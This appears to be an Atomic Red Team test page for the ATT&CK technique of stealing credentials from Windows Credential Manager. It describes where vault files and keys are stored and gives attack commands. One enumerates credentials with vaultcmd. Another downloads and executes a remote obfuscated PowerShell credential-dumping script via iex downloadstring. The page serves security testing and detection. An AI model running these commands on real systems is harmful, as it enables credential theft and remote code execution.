Try it using Invoke-Atomic

Credentials from Password Stores: Windows Credential Manager

Description from ATT&CK

Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)

The Windows Credential Manager separates website credentials from application or network credentials in two lockers. As part of Credentials from Web Browsers, Internet Explorer and Microsoft Edge website credentials are managed by the Credential Manager and are stored in the Web Credentials locker. Application and network credentials are stored in the Windows Credentials locker.

Credential Lockers store credentials in encrypted <code>.vcrd</code> files, located under <code>%Systemdrive%\Users\[Username]\AppData\Local\Microsoft\[Vault/Credentials]\</code>. The encryption key can be found in a file named <code>Policy.vpol</code>, typically located in the same folder as the credentials.(Citation: passcape Windows Vault)(Citation: Malwarebytes The Windows Vault)

Adversaries may list credentials managed by the Windows Credential Manager through several mechanisms. <code>vaultcmd.exe</code> is a native Windows executable that can be used to enumerate credentials stored in the Credential Locker through a command-line interface. Adversaries may gather credentials by reading files located inside of the Credential Lockers. Adversaries may also abuse Windows APIs such as <code>CredEnumerateA</code> to list credentials managed by the Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)

Adversaries may use password recovery tools to obtain plain text passwords from the Credential Manager.(Citation: Malwarebytes The Windows Vault) https://www.aleksandrhovhannisyan.com/blog/how-to-add-a-copy-to-clipboard-button-to-your-jekyll-blog/

Atomic Tests

Atomic Test #1 - Access Saved Credentials via VaultCmd

List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos https://blog.malwarebytes.com/101/2016/01/the-windows-vaults/ https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16

Supported Platforms: windows

auto_generated_guid: 9c2dd36d-5c8b-4b29-8d72-a11b0d5d7439

Inputs:

None

Attack Commands: Run with command_prompt!

1
2
vaultcmd /listcreds:"Windows Credentials"

Atomic Test #2 - WinPwn - Loot local Credentials - Invoke-WCMDump

Loot local Credentials - Invoke-WCMDump technique via function of WinPwn

Supported Platforms: windows

auto_generated_guid: fa714db1-63dd-479e-a58e-7b2b52ca5997

Inputs:

None

Attack Commands: Run with powershell!

1
2
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/obfuscatedps/DumpWCM.ps1')
Invoke-WCMDump

source